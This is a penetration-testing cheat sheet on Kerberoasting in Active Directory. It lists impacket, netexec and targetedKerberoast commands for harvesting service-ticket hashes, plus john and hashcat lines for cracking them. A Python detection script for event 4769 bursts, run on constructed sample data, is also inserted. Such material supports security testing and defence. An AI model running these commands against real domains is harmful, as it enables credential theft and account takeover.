# Kerberoasting Attack

Kerberoasting is an attack technique against Kerberos in which passwords are cracked using a credential that has already been gathered.

### Basic Attack

If we have the password hash of a user, we might be able to find another user's credential using that hash.

```
impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
# Without pre-authentication
# -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413
impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/

netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
netexec ldap <target-ip> -k --kerberoasting output.txt
netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt
```

After obtaining the hashes, we can crack them or use them for a pass-the-hash attack.
To crack them, run the following commands:

```
john --format=krb5tgs --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13100 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19600 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19700 -a 0 hash.txt wordlist.txt
```

Note that we may need to modify the hash format a bit so that john or hashcat can recognize it.
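Seen from the domain controller, the ticket requests above are logged as Security event 4769, so a burst of requests for many user-account SPNs from one principal is the usual detection signal. The following Python check is an added example (not from the original page or from any of the tools it names); the sample events are constructed, and the two-minute window and three-service threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23 (RC4-HMAC); 0x11 and 0x12 are AES128 and AES256
# Constructed sample of Security event 4769 records; all values are made up.
# Window and threshold defaults below are assumptions, tune per environment.
def _ev(ts, user, svc, etype, status="0x0"):
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype, "Status": status}

SAMPLE_EVENTS = [
    _ev("2024-05-01T09:00:01", "alice@EXAMPLE.LOCAL", "FILESRV01$", "0x12"),
    _ev("2024-05-01T09:00:05", "alice@EXAMPLE.LOCAL", "krbtgt", "0x12"),
    _ev("2024-05-01T09:14:00", "bob@EXAMPLE.LOCAL", "svc_sql", "0x17"),
    _ev("2024-05-01T09:14:01", "bob@EXAMPLE.LOCAL", "svc_web", "0x17"),
    _ev("2024-05-01T09:14:01", "bob@EXAMPLE.LOCAL", "svc_backup", "0x17"),
    _ev("2024-05-01T09:14:02", "bob@EXAMPLE.LOCAL", "svc_iis", "0x12"),
    _ev("2024-05-01T11:30:00", "carol@EXAMPLE.LOCAL", "svc_sql", "0x12"),
    _ev("2024-05-01T09:00:09", "WKSTN07$@EXAMPLE.LOCAL", "svc_web", "0x17"),
]

def is_candidate(ev):
    """Successful ticket request for a user-account SPN, made by a user."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == 4769 and ev["Status"] == "0x0"
            and not svc.endswith("$") and svc.lower() != "krbtgt"
            and not ev["TargetUserName"].split("@")[0].endswith("$"))

def detect_kerberoasting(events, window=timedelta(minutes=2), min_services=3):
    """Alert on one requester hitting >= min_services SPN accounts in a window."""
    by_user = defaultdict(list)
    for ev in filter(is_candidate, events):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        by_user[ev["TargetUserName"]].append((ts, ev))
    alerts = []
    for user, rows in by_user.items():
        rows.sort(key=lambda r: r[0])
        for i, (start, _) in enumerate(rows):
            burst = [e for t, e in rows[i:] if t - start <= window]
            services = {e["ServiceName"] for e in burst}
            if len(services) >= min_services:
                rc4 = sum(int(e["TicketEncryptionType"], 16) == RC4_HMAC for e in burst)
                alerts.append({"user": user, "services": sorted(services),
                               "rc4_tickets": rc4, "first_seen": start.isoformat()})
                break  # one alert per requester
    return alerts

if __name__ == "__main__":
    print(detect_kerberoasting(SAMPLE_EVENTS))
```

Requests made through the `-no-preauth` path use the AS exchange rather than the TGS exchange, so this 4769-based check does not cover them.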

### Get Hashes with TargetedKerberoast

[TargetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) is a Python script that can print kerberoast hashes for user accounts that have an SPN set. We can use it to get the hashes for users on the target machine.

```
# (Optional) Sync the local clock with the target machine
sudo rdate -n example.com
# or
sudo ntpdate example.com

# Execute targetedKerberoast to get the hash.
git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py -d example.com -u 'username' -p 'password'
```

